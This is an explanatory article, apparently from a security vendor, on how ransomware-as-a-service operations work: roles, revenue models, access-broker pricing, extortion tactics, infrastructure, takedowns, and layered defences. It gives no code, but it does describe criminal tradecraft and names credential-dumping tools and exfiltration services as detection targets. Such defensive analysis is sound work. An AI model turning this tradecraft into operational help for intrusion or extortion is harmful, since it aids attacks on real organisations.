What is Ransomware-as-a-Service (RaaS)?

Ransomware-as-a-Service is a cybercrime business model where ransomware operators develop and maintain the malware, infrastructure (encryption tools, negotiation portals, leak sites), and support services, then recruit affiliates to conduct the actual attacks. Affiliates are typically experienced penetration testers or hackers who handle initial access, lateral movement, data exfiltration, and ransomware deployment. Revenue from ransom payments is split between operator and affiliate, typically 70-80% to the affiliate and 20-30% to the operator. This model has industrialised ransomware by separating the technical development of the malware from the operational execution of attacks, allowing both roles to specialise.

How do RaaS groups recruit affiliates?

RaaS operators recruit affiliates through dark-web forums (XSS, RAMP, Exploit.in), Telegram channels, and private invitation networks. Recruitment posts typically specify requirements: proven experience with network penetration, minimum revenue targets for victim organisations ($10M+ annual revenue is common), geographic or sector restrictions (many operators prohibit attacks on CIS countries), and language proficiency (Russian is often required). Some operations require a deposit ($1,000-$5,000) or referral from an existing affiliate. Top-tier RaaS groups like LockBit operated competitive affiliate programmes with performance bonuses and technical support.

How can organisations defend against RaaS attacks?

Defence against RaaS focuses on disrupting the affiliate kill chain at each phase. For initial access: enforce MFA on all external services, patch VPN and remote-access vulnerabilities within 48 hours of disclosure, and monitor dark-web marketplaces for credential leaks and IAB listings mentioning your organisation. For lateral movement: implement network segmentation, deploy EDR with behavioural detection, restrict privileged-account usage, and monitor for living-off-the-land techniques (PsExec, WMI, PowerShell remoting). For exfiltration: monitor for large outbound data transfers, implement DLP policies, and detect staging behaviours (data compression, archive creation). For encryption prevention: maintain tested immutable backups and deploy canary files that trigger alerts when modified.

Ransomware-as-a-Service: How Criminal Ecosystems Operate in 2026

Ransomware is no longer the work of lone hackers writing malware in their basements. It is a mature criminal industry with specialised roles, supply chains, franchise models, customer support, and revenue-sharing agreements. The Ransomware-as-a-Service (RaaS) model has industrialised cyber extortion, enabling any skilled network intruder to deploy enterprise-grade ransomware without writing a single line of malware code.

Understanding how the RaaS ecosystem operates is not academic. Every aspect of the criminal supply chain reveals a defensive opportunity. When you understand how attackers buy access, move laterally, exfiltrate data, and negotiate ransoms, you can build defences that disrupt their operations at every stage.

The RaaS Business Model

Operators vs Affiliates

The RaaS model separates two distinct skill sets into specialised roles:

Operators — the developers and administrators. They build the ransomware encryptor, maintain the command-and-control infrastructure, operate the data-leak site, run the victim-negotiation portal, handle cryptocurrency payments, and recruit affiliates. Operators are typically small teams (5-15 people) with deep malware-development expertise.
Affiliates — the operators of the actual attacks. They gain initial access to victim networks, perform reconnaissance, move laterally, escalate privileges, exfiltrate data, and deploy the ransomware payload. Affiliates are experienced network intruders who may work across multiple RaaS platforms simultaneously.

Revenue Models

RaaS platforms use several revenue structures:

Percentage split — the dominant model. Affiliates keep 70-80% of the ransom, operators take 20-30%. Top performers may negotiate 85/15 splits. LockBit publicly offered affiliates 80% of all payments.
Subscription model — affiliates pay a monthly fee (typically $500-$2,000) for access to the ransomware toolkit. Less common because it generates less revenue for operators.
Flat fee per use — affiliates pay a one-time licensing fee ($2,000-$10,000) for a ransomware build. The affiliate keeps 100% of the ransom. Used by smaller RaaS operations.
Hybrid models — some operations combine a smaller percentage split with an upfront fee, or adjust the split based on the ransom amount (higher affiliate percentage for larger payments).

Figure 1 — The RaaS criminal ecosystem. Operators, affiliates, and Initial Access Brokers form a specialised supply chain with clear revenue flows.

The IAB Supply Chain

Initial Access Brokers (IABs) are the supply chain that fuels RaaS operations. These specialists focus exclusively on compromising organisations and then selling that access to ransomware affiliates, rather than conducting the ransomware attack themselves.

How IABs Operate

IABs use a range of techniques to establish initial footholds:

Exploiting perimeter vulnerabilities — unpatched VPN appliances (Fortinet, Pulse Secure, Citrix), remote-desktop gateways, and web-facing applications. CVE exploitation is systematic: IABs scan the internet for vulnerable devices within hours of a vulnerability disclosure.
Credential stuffing and brute-force — targeting RDP, VPN, and Citrix portals with credential lists from data breaches. Services without MFA are priority targets.
Phishing and social engineering — delivering malware (Emotet, BumbleBee, QakBot) that establishes a persistent backdoor, which is then sold as validated access.
Insider recruitment — some IABs recruit insiders (employees, contractors) to install remote-access tools, paying $1,000-$20,000 for access.

IAB Marketplace Economics

Access is sold on dark-web forums and marketplaces with standardised pricing:

RDP access — $50-$500 per server (basic server access, no domain admin)
VPN credentials — $500-$3,000 (provides network-level access)
Domain-admin access — $3,000-$10,000 (full Active Directory control)
Enterprise cloud access — $2,000-$8,000 (Azure AD global admin, AWS root)

Prices correlate with victim revenue: access to a $500M-revenue company commands 3-5x the price of a $50M-revenue company, because the potential ransom is proportionally higher.

The Evolution of Extortion Tactics

Single Extortion (Pre-2019)

Early ransomware simply encrypted files and demanded payment for the decryption key. If the victim had backups, they could restore without paying. This created a strong incentive for attackers to evolve their tactics.

Double Extortion (2019-Present)

The Maze group pioneered double extortion in late 2019: steal data before encrypting, then threaten to publish the stolen data if the ransom is not paid. Even organisations with perfect backups face the threat of sensitive data being published on a leak site. By 2025, over 90% of RaaS operations practice double extortion as standard procedure.

Triple Extortion

Triple extortion adds a third pressure layer:

DDoS attacks — some groups launch DDoS attacks against the victim to add urgency during negotiations
Customer and partner notification — attackers directly contact the victim's customers, partners, or patients (in healthcare attacks) to create external pressure and reputational damage
Regulatory reporting threats — attackers threaten to report the breach to regulators (SEC, ICO, data protection authorities) and publicly file complaints

Encryption-Less Extortion

A growing trend in 2025-2026: some groups skip encryption entirely and focus solely on data theft and extortion. This approach is faster, quieter, avoids triggering encryption-detection tools, and relies entirely on the threat of data publication. Groups like BianLian and Karakurt have shifted to this model.

RaaS Infrastructure and OPSEC

Technical Infrastructure

A mature RaaS operation maintains extensive infrastructure:

Builder and panel — a web application (typically on .onion) where affiliates generate customised ransomware builds, track victim infections, and monitor payment status
Data leak site (DLS) — a Tor-hosted website where stolen data is published if the victim does not pay. Operated as a public-facing threat to pressure victims.
Negotiation portal — a Tor-hosted chat interface where victims communicate with the attackers. Some operations provide "customer support" with 24/7 response times.
Cryptocurrency infrastructure — wallets, mixers/tumblers, and chain-hopping services to launder ransom payments. Monero is increasingly preferred over Bitcoin for its privacy features.
Bulletproof hosting — servers hosted in jurisdictions with weak or uncooperative law-enforcement frameworks. Providers guarantee no takedowns regardless of content.

Operator OPSEC Practices

Sophisticated RaaS operators practice careful operational security:

Communication through encrypted, ephemeral channels (Tox, Jabber/XMPP with OTR, Session messenger)
Compartmentalisation: affiliates interact only with their handler, never with other affiliates or core developers
No attacks on CIS (Commonwealth of Independent States) countries — widely believed to be a tacit agreement with law enforcement in those regions
Regular infrastructure rotation: new .onion addresses, new bulletproof hosting providers, new cryptocurrency wallets
Code obfuscation and anti-analysis techniques: sandbox detection, virtual-machine evasion, and encrypted payloads

Major RaaS Operations and Takedowns

LockBit

The most prolific RaaS operation from 2019 to 2024, responsible for an estimated 1,700+ attacks globally. LockBit operated a highly competitive affiliate programme, publicly posted their affiliate terms, and even ran a bug bounty for their malware. Operation Cronos (February 2024) disrupted LockBit's infrastructure, but the group attempted to rebuild before further law-enforcement action degraded their operations.

ALPHV/BlackCat

Notable for being written in Rust (enabling cross-platform targeting), ALPHV/BlackCat was the first major RaaS to offer a searchable leak site where individual data subjects could search for their personal information in stolen data. After an FBI seizure of their infrastructure in December 2023, the group rebounded before conducting an apparent exit scam in March 2024, keeping a $22M ransom from the Change Healthcare attack and leaving affiliates unpaid.

Hive

Disrupted by the FBI in January 2023 after a seven-month covert infiltration. The FBI obtained Hive's decryption keys and distributed them to over 300 victims, preventing an estimated $130M in ransom payments. This operation demonstrated the value of proactive law-enforcement infiltration versus reactive takedowns.

The Fragmentation Effect

Each major takedown fragments the ecosystem but does not eliminate it. Displaced affiliates migrate to new RaaS platforms within weeks. The skills (network intrusion, lateral movement, data exfiltration) transfer directly. New operators emerge to fill the vacuum, often started by former affiliates who understand the business model. The result is a more decentralised, resilient ecosystem.

Figure 2 — The RaaS affiliate kill chain with defensive controls mapped to each phase, and a timeline of major law-enforcement actions that have reshaped the ransomware landscape.

Defensive Strategy Against RaaS

Defending against RaaS requires disrupting the affiliate kill chain at each phase. No single control is sufficient because the RaaS model allows different affiliates with different techniques to attack the same target.

Phase 1: Prevent Initial Access

Patch external-facing services within 48 hours of vulnerability disclosure. IABs and affiliates scan for new vulnerabilities within hours. Fortinet, Citrix, Pulse Secure, Microsoft Exchange, and remote-desktop gateways are the most exploited.
Enforce MFA on every external-facing service: VPN, RDP, email, cloud administrative consoles, SaaS applications. Credential-based attacks are the most common initial-access vector.
Monitor dark-web marketplaces for IAB listings mentioning your organisation or industry. Threat-intelligence services can alert you if your credentials or network access appear for sale.
Reduce your attack surface: disable unnecessary external services, restrict RDP to VPN-only access, implement geo-fencing on administrative portals.

Phase 2: Detect Lateral Movement

Network segmentation limits lateral spread. Segment production environments from backup networks, separate IT from OT, and isolate high-value assets (domain controllers, financial systems, backup infrastructure).
EDR with behavioural detection identifies living-off-the-land techniques common in affiliate playbooks: PsExec, WMI, PowerShell remoting, Cobalt Strike beacons, and credential-dumping tools (Mimikatz, LaZagne).
Privileged-access management (PAM): just-in-time administrative access, privileged-account isolation, and monitoring of service-account usage.

Phase 3: Prevent Exfiltration

Data Loss Prevention (DLP) policies that detect large-volume file access and outbound transfers outside of normal business patterns.
Outbound traffic monitoring: affiliates commonly exfiltrate data using Rclone, Mega, file.io, and other cloud-storage services. Block or monitor access to these services at the proxy/firewall level.
Detect staging behaviours: large-scale archive creation (7zip, WinRAR), data being copied to unusual directories, and automated file-collection scripts.

Phase 4: Survive Encryption

Immutable backups with the 3-2-1-1-0 rule: ensure at least one backup copy is immutable or air-gapped and verified through automated restore testing.
Canary files and honeypots: deploy files that serve no legitimate purpose but will trigger alerts if accessed or modified, providing early warning of ransomware deployment.
Tested incident-response plan that accounts for the dual pressure of double extortion: plans for both data restoration and data-breach notification/disclosure.

The Evolving Landscape

The RaaS ecosystem is resilient because it is decentralised and market-driven. When law enforcement takes down one operation, affiliates migrate to competitors, and new operators emerge. Several trends are shaping the landscape in 2026:

Smaller, more agile groups — the era of dominant RaaS brands (LockBit, ALPHV) may be giving way to a more fragmented ecosystem of smaller groups with lower profiles and less law-enforcement attention.
Encryption-less extortion — pure data-theft extortion avoids encryption-detection tools and requires different defensive strategies focused on DLP and data-access monitoring.
AI-enhanced operations — AI tools for automating reconnaissance, generating convincing phishing content, and identifying high-value data for exfiltration.
Targeting of cloud and SaaS — as organisations move to cloud infrastructure, affiliates are developing capabilities for cloud-native attacks (Azure AD, AWS, GCP).

The RaaS model has made ransomware a persistent, adaptable threat that cannot be eliminated through any single intervention. Effective defence requires understanding the criminal ecosystem and building layered controls that disrupt the affiliate kill chain at every phase — from initial access through data exfiltration to encryption and negotiation.